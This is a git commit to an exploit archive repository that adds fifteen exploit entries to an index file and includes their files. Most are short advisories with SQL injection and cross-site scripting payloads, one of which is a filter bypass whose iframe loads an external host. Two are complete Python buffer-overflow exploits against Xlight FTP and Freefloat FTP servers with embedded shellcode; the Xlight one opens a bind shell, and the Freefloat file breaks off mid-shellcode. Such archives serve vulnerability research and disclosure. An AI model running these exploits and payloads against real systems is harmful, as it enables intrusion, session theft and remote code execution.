Update: 2015-02-15
15 new exploits
This commit is contained in:
parent
fafd87dba3
commit
a828258c67
16 changed files with 454 additions and 1 deletions
16
files.csv
16
files.csv
|
@ -26932,7 +26932,7 @@ id,file,description,date,author,platform,type,port
|
|||
30011,platforms/windows/remote/30011.rb,"Microsoft Tagged Image File Format (TIFF) Integer Overflow",2013-12-03,metasploit,windows,remote,0
|
||||
30012,platforms/php/webapps/30012.txt,"Chamilo Lms 1.9.6 (profile.php, password0 param) - SQL Injection",2013-12-03,"High-Tech Bridge SA",php,webapps,80
|
||||
30013,platforms/php/webapps/30013.txt,"Dokeos 2.2 RC2 (index.php, language param) - SQL Injection",2013-12-03,"High-Tech Bridge SA",php,webapps,80
|
||||
30014,platforms/windows/local/30014.py,"Windows NDPROXY - Local SYSTEM Privilege Escalation",2013-12-03,ryujin,windows,local,0
|
||||
30014,platforms/windows/local/30014.py,"Windows NDPROXY - Local SYSTEM Privilege Escalation (MS14-002)",2013-12-03,ryujin,windows,local,0
|
||||
30015,platforms/php/webapps/30015.txt,"Advanced Guestbook 2.4.2 Lang Cookie Parameter Local File Include Vulnerability",2007-05-08,netVigilance,php,webapps,0
|
||||
30016,platforms/windows/remote/30016.txt,"Adobe RoboHelp Frameset-7.HTML Cross-Site Scripting Vulnerability",2007-05-08,"Michael Domberg",windows,remote,0
|
||||
30017,platforms/unix/local/30017.sh,"HP Tru64 5.0.1 DOP Command Local Privilege Escalation Vulnerability",2007-05-08,"Daniele Calore",unix,local,0
|
||||
|
@ -32500,3 +32500,17 @@ id,file,description,date,author,platform,type,port
|
|||
36057,platforms/cgi/webapps/36057.txt,"IBM Endpoint Manager - Stored XSS Vulnerability",2015-02-11,"RedTeam Pentesting",cgi,webapps,52311
|
||||
36058,platforms/php/webapps/36058.txt,"Wordpress Video Gallery 2.7.0 - SQL Injection Vulnerability",2015-02-12,"Claudio Viviani",php,webapps,0
|
||||
36059,platforms/php/webapps/36059.txt,"Exponent CMS 2.3.1 - Multiple XSS Vulnerabilities",2015-02-12,"Mayuresh Dani",php,webapps,80
|
||||
36063,platforms/asp/webapps/36063.txt,"Code Widgets Online Job Application 'admin.asp' Multiple SQL Injection Vulnerabilities",2011-08-17,"L0rd CrusAd3r",asp,webapps,0
|
||||
36064,platforms/asp/webapps/36064.txt,"Code Widgets DataBound Index Style Menu 'category.asp' SQL Injection Vulnerability",2011-08-17,Inj3ct0r,asp,webapps,0
|
||||
36065,platforms/asp/webapps/36065.txt,"Code Widgets DataBound Collapsible Menu 'main.asp' SQL Injection Vulnerability",2011-08-17,Inj3ct0r,asp,webapps,0
|
||||
36066,platforms/asp/webapps/36066.txt,"Code Widgets Multiple Question - Multiple Choice Online Questionaire SQL Injection Vulnerability",2011-08-17,"L0rd CrusAd3r",asp,webapps,0
|
||||
36067,platforms/cfm/webapps/36067.txt,"Adobe ColdFusion 'probe.cfm' Cross Site Scripting Vulnerability",2011-08-18,G.R0b1n,cfm,webapps,0
|
||||
36068,platforms/php/webapps/36068.txt,"MantisBT <= 1.1.8 Cross Site Scripting and SQL Injection Vulnerabilities",2011-08-18,Net.Edit0r,php,webapps,0
|
||||
36070,platforms/php/dos/36070.txt,"PHP Prior to 5.3.7 Multiple NULL Pointer Dereference Denial Of Service Vulnerabilities",2011-08-19,"Maksymilian Arciemowicz",php,dos,0
|
||||
36071,platforms/windows/dos/36071.py,"Xlight FTP Server 3.7 Remote Buffer Overflow Vulnerability",2011-08-19,KedAns-Dz,windows,dos,0
|
||||
36072,platforms/php/webapps/36072.txt,"OneFileCMS 1.1.1 'onefilecms.php' Cross Site Scripting Vulnerability",2011-08-21,mr.pr0n,php,webapps,0
|
||||
36073,platforms/php/webapps/36073.txt,"Pandora FMS 3.x 'index.php' Cross Site Scripting Vulnerability",2011-08-22,"mehdi boukazoula",php,webapps,0
|
||||
36074,platforms/php/webapps/36074.txt,"TotalShopUK 1.7.2 'index.php' SQL Injection Vulnerability",2011-08-22,"Eyup CELIK",php,webapps,0
|
||||
36075,platforms/windows/remote/36075.py,"Freefloat FTP Server 'ALLO' Command Remote Buffer Overflow Vulnerability",2011-08-20,Black.Spook,windows,remote,0
|
||||
36076,platforms/php/webapps/36076.txt,"Concrete 5.4.1 1 'rcID' Parameter Cross Site Scripting Vulnerability",2011-08-22,"Aung Khant",php,webapps,0
|
||||
36077,platforms/php/webapps/36077.txt,"Open Classifieds 1.7.2 Multiple Cross Site Scripting Vulnerabilities",2011-08-23,"Yassin Aboukir",php,webapps,0
|
||||
|
|
Can't render this file because it is too large.
|
10
platforms/asp/webapps/36063.txt
Executable file
10
platforms/asp/webapps/36063.txt
Executable file
|
@ -0,0 +1,10 @@
|
|||
source: http://www.securityfocus.com/bid/49207/info
|
||||
|
||||
Code Widgets Online Job Application is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
|
||||
|
||||
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
|
||||
|
||||
The following example input is available:
|
||||
|
||||
Username : ' or 1=1 or ''=''
|
||||
Password: ' or 1=1 or ''=''
|
7
platforms/asp/webapps/36064.txt
Executable file
7
platforms/asp/webapps/36064.txt
Executable file
|
@ -0,0 +1,7 @@
|
|||
source: http://www.securityfocus.com/bid/49208/info
|
||||
|
||||
Code Widgets DataBound Index Style Menu is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
|
||||
|
||||
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
|
||||
|
||||
http://www.example.com/CS0106/category.asp?cat=[sqli]
|
7
platforms/asp/webapps/36065.txt
Executable file
7
platforms/asp/webapps/36065.txt
Executable file
|
@ -0,0 +1,7 @@
|
|||
source: http://www.securityfocus.com/bid/49209/info
|
||||
|
||||
Code Widgets DataBound Collapsible Menu is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
|
||||
|
||||
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
|
||||
|
||||
http://www.example.com/CS0077/main.asp?key=[sqli]
|
7
platforms/asp/webapps/36066.txt
Executable file
7
platforms/asp/webapps/36066.txt
Executable file
|
@ -0,0 +1,7 @@
|
|||
source: http://www.securityfocus.com/bid/49210/info
|
||||
|
||||
Code Widgets Multiple Question - Multiple Choice Online Questionaire is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
|
||||
|
||||
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
|
||||
|
||||
http://www.example.com/CS0099/index.asp?Q=2&A=[sqli]
|
7
platforms/cfm/webapps/36067.txt
Executable file
7
platforms/cfm/webapps/36067.txt
Executable file
|
@ -0,0 +1,7 @@
|
|||
source: http://www.securityfocus.com/bid/49220/info
|
||||
|
||||
Adobe ColdFusion is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
|
||||
|
||||
An attacker could exploit this vulnerability to execute arbitrary script code in the context of the affected website. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
|
||||
|
||||
http://www.example.com/CFIDE/probe.cfm?name=<script>alert("G.R0b1n")</script>
|
143
platforms/cgi/webapps/35900.txt
Executable file
143
platforms/cgi/webapps/35900.txt
Executable file
|
@ -0,0 +1,143 @@
|
|||
Document Title:
|
||||
===============
|
||||
Barracuda Networks Cloud Series - Filter Bypass Vulnerability
|
||||
|
||||
|
||||
References (Source):
|
||||
====================
|
||||
http://www.vulnerability-lab.com/get_content.php?id=754
|
||||
|
||||
Barracuda Networks Security ID (BNSEC): 731
|
||||
|
||||
|
||||
Release Date:
|
||||
=============
|
||||
2015-01-19
|
||||
|
||||
|
||||
Vulnerability Laboratory ID (VL-ID):
|
||||
====================================
|
||||
754
|
||||
|
||||
|
||||
Common Vulnerability Scoring System:
|
||||
====================================
|
||||
4.5
|
||||
|
||||
|
||||
Abstract Advisory Information:
|
||||
==============================
|
||||
The Vulnerability Laboratory Research Team discovered a filter bypass vulnerability in the official Barracuda Cloud Series Products.
|
||||
|
||||
|
||||
Vulnerability Disclosure Timeline:
|
||||
==================================
|
||||
2015-01-19: Public Disclosure (Vulnerability Laboratory)
|
||||
|
||||
|
||||
Discovery Status:
|
||||
=================
|
||||
Published
|
||||
|
||||
|
||||
Affected Product(s):
|
||||
====================
|
||||
Barracuda Networks
|
||||
Product: Cloud Control Center 2014 Q2
|
||||
|
||||
|
||||
Exploitation Technique:
|
||||
=======================
|
||||
Remote
|
||||
|
||||
|
||||
Severity Level:
|
||||
===============
|
||||
Medium
|
||||
|
||||
|
||||
Technical Details & Description:
|
||||
================================
|
||||
A filter bypass vulnerability has been discovered in the official Barracuda Networks Cloud Series Appliance Applications 2014-Q1.
|
||||
The filter bypass issue allows an attacker to bypass the secure filter validation of the service to execute malicious script codes.
|
||||
|
||||
The barracuda filter blocks for example standard iframes, scripts and other invalid code context: The cloud service has a own exception-handling
|
||||
to parse or encode malicious injected web context. The mechanism filters the first request and sanitizes the output in every input field.
|
||||
|
||||
During a pentest we injected a standard iframe to check and provoke the validation. The frame got blocked! In the next step the attacker splits (%20%20%20)
|
||||
the request and injects at the end an onload frame to an external malicious source. The second iframe with the onload alert executes the script codes after
|
||||
the validation encoded only the first script code tag. The second script code tag can bypass the applicance filter mechanism and executes in the web context
|
||||
of affected modules. The secure validation does not recognize a splitted request which results in client-side and application-side script code execution in
|
||||
the cloud series products.
|
||||
|
||||
The security risk of the filter bypass vulnerability is estimated as medium and the cvss (common vulnerability scoring system) count is 4.5 (medium).
|
||||
Exploitation of the filter bypass vulnerability requires a low privileged application user account with restricted access and low user interaction.
|
||||
Successful exploitation of the vulnerability results in session hijacking, persistent phishing, persistent external redirects and persistent manipulation
|
||||
of affected or connected module context.
|
||||
|
||||
Vulnerable Request Method(s):
|
||||
[+] POST & GET
|
||||
|
||||
|
||||
Proof of Concept (PoC):
|
||||
=======================
|
||||
The filter bypass web vulnerability can be exploited by local privileged user accounts and remote attackers with low or medium user interaction.
|
||||
For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue.
|
||||
|
||||
PoC:
|
||||
<iframe src=a>%20%20%20%20\"><iframe src=http://vuln-lab.com onload=alert("VL") <
|
||||
|
||||
PoC:
|
||||
<script language=JavaScript>m='%3Ciframe%20src%3Da%3E%2520%2520%2520%2520%5C%22%3E%3Ciframe%20src%3Dhttp%3A//vuln-lab.com%20onload%3Dalert%28%22VL%22%29%20%3C';d=unescape(m);document.write(d);</script>
|
||||
|
||||
|
||||
Solution - Fix & Patch:
|
||||
=======================
|
||||
The issue can be patched by a secure validation of the full message input body context of any input or request method attempt.
|
||||
Ensure that the validaton does not only encode the first injected script code since a empty char arrives. Filter all web context
|
||||
that runs through the requesting procedure and parse separatly to prevent script code injection attacks.
|
||||
|
||||
Note: Barracuda Networks patched the vulnerability and acknowledged the researcher. Updates are available in Barracuda Labs and the Customer Service.
|
||||
|
||||
|
||||
Security Risk:
|
||||
==============
|
||||
The security risk of the filter bypass web vulnerability in the barracuda cloud product series is estimated as medium. (CVSS 4.5)
|
||||
|
||||
|
||||
Credits & Authors:
|
||||
==================
|
||||
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]
|
||||
|
||||
|
||||
Disclaimer & Information:
|
||||
=========================
|
||||
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed
|
||||
or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable
|
||||
in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab
|
||||
or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for
|
||||
consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses,
|
||||
policies, deface websites, hack into databases or trade with fraud/stolen material.
|
||||
|
||||
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
|
||||
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
|
||||
Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact
|
||||
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
|
||||
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
|
||||
Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/
|
||||
|
||||
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to
|
||||
electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
|
||||
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website
|
||||
is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact
|
||||
(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.
|
||||
|
||||
Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]™
|
||||
|
||||
--
|
||||
VULNERABILITY LABORATORY - RESEARCH TEAM
|
||||
SERVICE: www.vulnerability-lab.com
|
||||
CONTACT: research@vulnerability-lab.com
|
||||
PGP KEY: http://www.vulnerability-lab.com/keys/admin@vulnerability-lab.com%280x198E9928%29.txt
|
||||
|
||||
|
32
platforms/php/dos/36070.txt
Executable file
32
platforms/php/dos/36070.txt
Executable file
|
@ -0,0 +1,32 @@
|
|||
source: http://www.securityfocus.com/bid/49249/info
|
||||
|
||||
PHP is prone to multiple denial-of-service vulnerabilities caused by a NULL-pointer dereference.
|
||||
|
||||
An attacker can exploit these issues to cause an application written in PHP to crash, denying service to legitimate users.
|
||||
|
||||
PHP 5.3.7 is vulnerable; other versions may also be affected.
|
||||
|
||||
127# ulimit -m 100000
|
||||
127# ulimit -v 100000
|
||||
127# cat /www/strtotime.php
|
||||
<?php
|
||||
$strx=str_repeat("A",$argv[1]);
|
||||
var_dump(strtotime($strx));
|
||||
?>127#
|
||||
127# /cxib/5371/build/bin/php /www/strtotime.php 33388888
|
||||
Memory fault (core dumped)
|
||||
|
||||
127# gdb -q /cxib/5371/build/bin/php
|
||||
(gdb) r /www/strtotime.php 33388888
|
||||
Starting program: /cxib/5371/build/bin/php /www/strtotime.php 33388888
|
||||
|
||||
Program received signal SIGSEGV, Segmentation fault.
|
||||
0x0806e8bd in add_error (s=0xbfbfcf90,
|
||||
error=0x83ea7d8 "Double timezone specification")
|
||||
at /cxib/5371/ext/date/lib/parse_date.c:355
|
||||
355 s->errors->error_messages[s->errors->error_count -
|
||||
1].position = s->tok ? s->tok - s->str : 0;
|
||||
(gdb) print s->errors->error_messages
|
||||
$1 = (struct timelib_error_message *) 0x0
|
||||
(gdb) print s->errors->error_count
|
||||
$2 = 1835009
|
10
platforms/php/webapps/36068.txt
Executable file
10
platforms/php/webapps/36068.txt
Executable file
|
@ -0,0 +1,10 @@
|
|||
source: http://www.securityfocus.com/bid/49235/info
|
||||
|
||||
MantisBT is prone to an SQL-injection vulnerability and a cross-site scripting vulnerability.
|
||||
|
||||
Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
|
||||
|
||||
MantisBT 1.2.6 is vulnerable; other versions may also be affected.
|
||||
|
||||
http://www.example.com/path/search.php?project_id=[XSS]
|
||||
http://www.example.com/path/core.php?mbadmin=[SQL]
|
9
platforms/php/webapps/36072.txt
Executable file
9
platforms/php/webapps/36072.txt
Executable file
|
@ -0,0 +1,9 @@
|
|||
source: http://www.securityfocus.com/bid/49257/info
|
||||
|
||||
OneFileCMS is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input before using it in dynamically generated content.
|
||||
|
||||
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
|
||||
|
||||
OneFileCMS 1.1.1 is vulnerable; other versions may also be affected.
|
||||
|
||||
http://www.example.com/onefilecms/onefilecms.php?p='"><marquee><h1>XSS Vulnerability<script>alert(String.fromCharCode(88,83,83))</script></h1></marquee>
|
9
platforms/php/webapps/36073.txt
Executable file
9
platforms/php/webapps/36073.txt
Executable file
|
@ -0,0 +1,9 @@
|
|||
source: http://www.securityfocus.com/bid/49261/info
|
||||
|
||||
Pandora FMS is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
|
||||
|
||||
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
|
||||
|
||||
Pandora FMS 3.2.1 is vulnerable; other versions may also be affected.
|
||||
|
||||
http://www.example.com/pandora_console/index.php?sec=estado&sec2=operation/agentes/estado_agente&refr=60&group_id=12&offset=0&search=bob%22%3E%3Cscript%3Ealert%28%22XSS%22%29%3C/script%3E
|
9
platforms/php/webapps/36074.txt
Executable file
9
platforms/php/webapps/36074.txt
Executable file
|
@ -0,0 +1,9 @@
|
|||
source: http://www.securityfocus.com/bid/49263/info
|
||||
|
||||
TotalShopUK is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query.
|
||||
|
||||
A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
|
||||
|
||||
TotalShopUK 1.7.2 is vulnerable; other versions may also be affected.
|
||||
|
||||
http://www.example.com/products/c/index.php/1'
|
14
platforms/php/webapps/36076.txt
Executable file
14
platforms/php/webapps/36076.txt
Executable file
|
@ -0,0 +1,14 @@
|
|||
source: http://www.securityfocus.com/bid/49276/info
|
||||
|
||||
Concrete is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
|
||||
|
||||
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
|
||||
|
||||
Concrete 5.4.1.1 is vulnerable; other versions may also be affected.
|
||||
|
||||
<form action="http://www.example.com/Concrete/index.php/login/do_login/" method="post">
|
||||
<input type="hidden" name="uName" value="test" />
|
||||
<input type="hidden" name="uPassword" value="test" />
|
||||
<input type="hidden" name="rcID" value='" style=display:block;color:red;width:9999;height:9999;z-index:9999;top:0;left:0;background-image:url(javascript:alert(/XSS/));width:expression(alert(/XSS/)); onmouseover="alert(/XSS/)' />
|
||||
<input type="submit" name="submit" value="Get Concrete CMS 5.4.1.1 XSS" />
|
||||
</form>
|
9
platforms/php/webapps/36077.txt
Executable file
9
platforms/php/webapps/36077.txt
Executable file
|
@ -0,0 +1,9 @@
|
|||
source: http://www.securityfocus.com/bid/49292/info
|
||||
|
||||
Open Classifieds is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
|
||||
|
||||
An attacker may leverage these issues to execute arbitrary HTML and script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
|
||||
|
||||
Open Classifieds 1.7.2 is vulnerable; other versions may also be affected.
|
||||
|
||||
http://www.example.com/oc172/?s="+onmouseover=alert(408852135615)+
|
75
platforms/windows/dos/36071.py
Executable file
75
platforms/windows/dos/36071.py
Executable file
|
@ -0,0 +1,75 @@
|
|||
source: http://www.securityfocus.com/bid/49255/info
|
||||
|
||||
Xlight FTP Serveris prone to a remote buffer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied data.
|
||||
|
||||
Attackers can exploit this issue to execute arbitrary code within the context of the application. Failed attacks may cause a denial-of-service condition.
|
||||
|
||||
Xlight FTP Server 3.7.0 is vulnerable; other versions may also be affected.
|
||||
|
||||
#!/usr/bin/python
|
||||
|
||||
from socket import *
|
||||
import sys, struct, os, time
|
||||
|
||||
print "\nXlightFTP Server v3.7.0 Remote Root BOF Exploit"
|
||||
if (len(sys.argv) < 3):
|
||||
print "\nXlightFTP Server v3.7.0 Remote Root BOF Exploit"
|
||||
print "\n Usage: %s <host> <port> \n" %(sys.argv[0])
|
||||
sys.exit()
|
||||
|
||||
print "\n[!] Connecting to %s ..." %(sys.argv[1])
|
||||
|
||||
# connect to host
|
||||
sock = socket(AF_INET,SOCK_STREAM)
|
||||
sock.connect((sys.argv[1],int(sys.argv[2])))
|
||||
sock.recv(1024)
|
||||
time.sleep(5)
|
||||
#-------------------------------------------
|
||||
buffer = "\x41" * 1337 # Junk
|
||||
buffer += "\x90" * 123 # padding
|
||||
#-------------------------------------------
|
||||
# windows/shell_bind_tcp - 368 bytes
|
||||
# Encoder: x86/shikata_ga_nai (http://www.metasploit.com)
|
||||
# LPORT=4444, RHOST=192.168.1.2, EXITFUNC=process
|
||||
buffer += ("\x33\xc9\xbf\xb8\xf7\xfd\xd9\xda\xd8\xd9\x74\x24\xf4\xb1"+
|
||||
"\x56\x5d\x83\xc5\x04\x31\x7d\x0d\x03\x7d\xb5\x15\x08\x25"+
|
||||
"\x2d\x50\xf3\xd6\xad\x03\x7d\x33\x9c\x11\x19\x37\x8c\xa5"+
|
||||
"\x69\x15\x3c\x4d\x3f\x8e\xb7\x23\xe8\xa1\x70\x89\xce\x8c"+
|
||||
"\x81\x3f\xcf\x43\x41\x21\xb3\x99\x95\x81\x8a\x51\xe8\xc0"+
|
||||
"\xcb\x8c\x02\x90\x84\xdb\xb0\x05\xa0\x9e\x08\x27\x66\x95"+
|
||||
"\x30\x5f\x03\x6a\xc4\xd5\x0a\xbb\x74\x61\x44\x23\xff\x2d"+
|
||||
"\x75\x52\x2c\x2e\x49\x1d\x59\x85\x39\x9c\x8b\xd7\xc2\xae"+
|
||||
"\xf3\xb4\xfc\x1e\xfe\xc5\x39\x98\xe0\xb3\x31\xda\x9d\xc3"+
|
||||
"\x81\xa0\x79\x41\x14\x02\x0a\xf1\xfc\xb2\xdf\x64\x76\xb8"+
|
||||
"\x94\xe3\xd0\xdd\x2b\x27\x6b\xd9\xa0\xc6\xbc\x6b\xf2\xec"+
|
||||
"\x18\x37\xa1\x8d\x39\x9d\x04\xb1\x5a\x79\xf9\x17\x10\x68"+
|
||||
"\xee\x2e\x7b\xe5\xc3\x1c\x84\xf5\x4b\x16\xf7\xc7\xd4\x8c"+
|
||||
"\x9f\x6b\x9d\x0a\x67\x8b\xb4\xeb\xf7\x72\x36\x0c\xd1\xb0"+
|
||||
"\x62\x5c\x49\x10\x0a\x37\x89\x9d\xdf\x98\xd9\x31\x8f\x58"+
|
||||
"\x8a\xf1\x7f\x31\xc0\xfd\xa0\x21\xeb\xd7\xd7\x65\x25\x03"+
|
||||
"\xb4\x01\x44\xb3\x2b\x8e\xc1\x55\x21\x3e\x84\xce\xdd\xfc"+
|
||||
"\xf3\xc6\x7a\xfe\xd1\x7a\xd3\x68\x6d\x95\xe3\x97\x6e\xb3"+
|
||||
"\x40\x3b\xc6\x54\x12\x57\xd3\x45\x25\x72\x73\x0f\x1e\x15"+
|
||||
"\x09\x61\xed\x87\x0e\xa8\x85\x24\x9c\x37\x55\x22\xbd\xef"+
|
||||
"\x02\x63\x73\xe6\xc6\x99\x2a\x50\xf4\x63\xaa\x9b\xbc\xbf"+
|
||||
"\x0f\x25\x3d\x4d\x2b\x01\x2d\x8b\xb4\x0d\x19\x43\xe3\xdb"+
|
||||
"\xf7\x25\x5d\xaa\xa1\xff\x32\x64\x25\x79\x79\xb7\x33\x86"+
|
||||
"\x54\x41\xdb\x37\x01\x14\xe4\xf8\xc5\x90\x9d\xe4\x75\x5e"+
|
||||
"\x74\xad\x86\x15\xd4\x84\x0e\xf0\x8d\x94\x52\x03\x78\xda"+
|
||||
"\x6a\x80\x88\xa3\x88\x98\xf9\xa6\xd5\x1e\x12\xdb\x46\xcb"+
|
||||
"\x14\x48\x66\xde")
|
||||
#-------------------------------------
|
||||
buffer += "\x90" * 8 # more nop's
|
||||
#-------------------------------------
|
||||
buffer += "\x07\xd5\xc5\x7c" # jmp esp in shell32.dll (Windows XP SP3 - Universal)
|
||||
buffer += "\x0a" # end connection
|
||||
# send buffer
|
||||
print "[*] Sending Buffer Junk..."
|
||||
time.sleep(2)
|
||||
print "[*] Spawn a Backshell Connecting..."
|
||||
sock.send(buffer)
|
||||
sock.recv(1024)
|
||||
sock.close()
|
||||
print "[+] Exploit succeed. Now NetCat %s on port 4444\n" %(sys.argv[1])
|
||||
print "\n > Exploit By : KedAns-Dz - Dz Offenders Cr3w - Inj3ct0r Team"
|
||||
sys.exit()
|
91
platforms/windows/remote/36075.py
Executable file
91
platforms/windows/remote/36075.py
Executable file
|
@ -0,0 +1,91 @@
|
|||
source: http://www.securityfocus.com/bid/49265/info
|
||||
|
||||
Freefloat FTP Server is prone to a buffer-overflow vulnerability.
|
||||
|
||||
An attacker can exploit this issue to execute arbitrary code within the context of the affected application. Failed exploit attempts will result in a denial-of-service condition.
|
||||
|
||||
import socket
|
||||
import sys
|
||||
|
||||
def usage():
|
||||
|
||||
print "usage : ./freefloatftp.py <victim_ip> <victim_port>"
|
||||
print "example: ./freefloatftp.py 192.168.1.100 21"
|
||||
|
||||
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
||||
|
||||
|
||||
print "\n"
|
||||
print "#############################################################################"
|
||||
print "# Freefloat FTP Server ALLO Buffer Overflow Vulnerability Exploit #"
|
||||
print "#############################################################################"
|
||||
print "\n"
|
||||
|
||||
|
||||
if len(sys.argv) != 3:
|
||||
usage()
|
||||
sys.exit()
|
||||
|
||||
ip = sys.argv[1]
|
||||
port = sys.argv[2]
|
||||
|
||||
junk1= "\x41" * 246
|
||||
ret = "\xED\x1E\x94\x7C" #7C941EED JMP ESP
|
||||
nop = "\x90"* 200
|
||||
# windows/exec CMD=calc.exe
|
||||
shellcode =("\x89\xe3\xdb\xd4\xd9\x73\xf4\x5d\x55\x59\x49\x49\x49\x49"
|
||||
"\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51"
|
||||
"\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32"
|
||||
"\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41"
|
||||
"\x42\x75\x4a\x49\x4d\x6f\x58\x70\x56\x4f\x54\x70\x4d\x6e"
|
||||
"\x58\x59\x58\x4b\x54\x69\x5a\x69\x4d\x61\x56\x53\x4b\x69"
|
||||
"\x52\x54\x45\x74\x4b\x44\x43\x6a\x45\x61\x50\x7a\x45\x42"
|
||||
"\x4d\x53\x58\x42\x54\x44\x43\x33\x4d\x5a\x45\x71\x58\x52"
|
||||
"\x50\x4b\x4d\x46\x5a\x76\x4d\x4b\x4c\x74\x43\x56\x45\x77"
|
||||
"\x49\x6c\x45\x6d\x4c\x43\x56\x76\x54\x6e\x56\x39\x4b\x70"
|
||||
"\x54\x4b\x4b\x4e\x51\x39\x4d\x54\x4d\x77\x51\x65\x51\x6f"
|
||||
"\x45\x6c\x54\x73\x49\x6b\x4d\x78\x45\x63\x4c\x34\x58\x36"
|
||||
"\x4e\x6e\x50\x7a\x47\x75\x54\x37\x56\x6f\x58\x50\x4b\x75"
|
||||
"\x47\x69\x49\x63\x47\x5a\x54\x5a\x4b\x4a\x5a\x6a\x4b\x55"
|
||||
"\x50\x6f\x4b\x4b\x54\x4b\x45\x4b\x4d\x4f\x4d\x79\x58\x44"
|
||||
"\x56\x30\x54\x72\x51\x4e\x51\x70\x47\x54\x4e\x6f\x43\x6f"
|
||||
"\x4e\x46\x51\x33\x4c\x6f\x56\x47\x5a\x63\x5a\x53\x43\x74"
|
||||
"\x5a\x32\x49\x5a\x45\x73\x58\x74\x4e\x49\x4e\x65\x4b\x6b"
|
||||
"\x51\x6e\x49\x65\x50\x35\x49\x4a\x51\x43\x5a\x45\x56\x6a"
|
||||
"\x4d\x45\x4e\x38\x49\x4e\x49\x69\x56\x44\x54\x49\x54\x6f"
|
||||
"\x47\x71\x52\x37\x50\x75\x49\x6c\x47\x4c\x4e\x78\x50\x78"
|
||||
"\x4b\x4c\x52\x59\x47\x6e\x45\x33\x4c\x4b\x52\x51\x51\x4d"
|
||||
"\x47\x6e\x4e\x6c\x43\x71\x47\x6c\x4f\x34\x56\x79\x43\x64"
|
||||
"\x4c\x46\x4e\x6f\x4f\x4a\x4d\x6c\x56\x57\x47\x33\x43\x6c"
|
||||
"\x47\x46\x47\x4b\x47\x58\x45\x7a\x54\x50\x43\x6f\x4e\x4f"
|
||||
"\x4b\x4f\x54\x6a\x51\x4b\x54\x64\x49\x6e\x4b\x4c\x5a\x4a"
|
||||
"\x51\x6e\x56\x45\x4e\x39\x4c\x77\x54\x65\x43\x74\x54\x38"
|
||||
"\x47\x6d\x4c\x4b\x50\x79\x4c\x5a\x58\x79\x50\x74\x4b\x6c"
|
||||
"\x4e\x30\x5a\x4b\x51\x71\x52\x46\x4d\x6b\x45\x31\x51\x67"
|
||||
"\x58\x6a\x4b\x71\x5a\x6c\x52\x57\x4b\x44\x4b\x79\x51\x6e"
|
||||
"\x54\x50\x4f\x35\x43\x72\x56\x71\x50\x67\x5a\x7a\x4b\x30"
|
||||
"\x50\x56\x4f\x67\x4e\x70\x4b\x39\x49\x6e\x50\x30\x43\x4d"
|
||||
"\x51\x48\x52\x63\x51\x4d\x51\x6e\x58\x36\x4b\x37\x56\x38"
|
||||
"\x49\x6d\x54\x73\x52\x57\x4f\x6f\x47\x6d\x45\x66\x51\x62"
|
||||
"\x4b\x6b\x4c\x59\x4f\x5a\x54\x4e\x54\x34\x52\x6c\x58\x4d"
|
||||
